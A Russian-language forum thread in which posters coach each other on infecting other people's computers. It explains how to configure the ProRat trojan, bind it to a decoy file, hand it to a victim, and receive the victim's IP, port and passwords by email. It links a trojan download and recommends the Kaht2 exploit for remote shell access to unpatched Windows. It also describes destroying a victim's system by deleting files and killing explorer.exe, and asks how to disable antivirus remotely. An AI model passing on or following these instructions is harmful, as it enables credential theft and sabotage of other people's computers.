Ну я ж тебе ссылку дал... Бери например ProRat Fix 2. Настраивать - делать нефиг, всё, кроме хелпа на русском... Что ещё надо? Сначала зарегишь мыло на yahoo@com. Создаёшь сервер, склеиваешь одновременно с небольшим файликом, в настройках прописываешь своё мыло, кому-нить подсовываешь сервер троя. Он его запускает, на е-майл твой приходит ип и порт, вставляешь в про-рат и радуешься жизни!!! Тука убедись, что у твоего подопечного антивиря с фаером нет! А то не прокатит... ProRat Fix 2 http://www.trojanfrance.com/index.php?dir=Trojans/ProRAT/&file=ProRat v1.9 FIX2.zip Усё...
можеш мне трой какойнить простенький дать и написать как его сконфигурировать и чтоб пароли от инета летели на мыло ? Ну пожалста! надеюсь на помощь!
Тебе нужны пароли от инета? НУ тогда не обезательно сразу трой кидать)) Попробуй просканить сеть (сканер Retina), и используй kaht2.. Ну а если Винды у всех пропартчены то остаётся трой))
Да забей ты на этот апокалипсис! Ты мой предыдущий пост читал??? Там ж всё написано... Меню про-рата ж на русском!!!
все сделал как ты сказал, пробовал на себе - пришло на мыло что надо : порт пароль и айпи. Подключился к себе - все ок. Потом както еще попробовал на себе пароли не приходят затем еще раза 3 пробовал - не приходят. Что это может быть? С апокалипсисом все ясно - я просто поставил раньше .NET framework вот он мне и не давал его запускать)
Таких вирусов нет...Стелс-вирусы, а тем боллее трояны сразу файловую систему разрушить не могут...это все происходит постепенно...и за это время пользователь если не полный лох обнаружит вирь...
даа апокалипсис это вещсч но Палитьс жутко Зы:Врятли это твой друг писал апокалипсис писала Тсофт целая команда хотя хз может он в той команде но чот мне не верится
2longshood сегодня выложу апокалипсис на вебфайле ближе к вечеру мало ли у тя версия паленая какаинить
Вот совет для тех кому нужен вирус "чтоб винду убил". Я делаю так - сам себе вирус -тока на те машины не выше SP1 (включительно). Простым Kaht2 получаешь доступ к командной строке - стираешь или переименовываешь в папке Windows все ненужные файлы (ну типа explorer.exe) а потом taskkilом убиваешь процесс explorer.exe - у чела ясен хер перезагружается тачка а потом ниче не загружается. У меня вопрос: как можно удаленно завершить работу антивиря?
Хватит удалить только файл подкачки )) а спешить некуда, по любому перегрузит =) На любое мыло приходит IP, а вот по аське оно не сообщает. Но это не большая проблема, можно просто сделать: там есть функция отсылать на гейт. Как только приходит IP перенаправить его на аську средствами PHP. Поищите Tristram писал.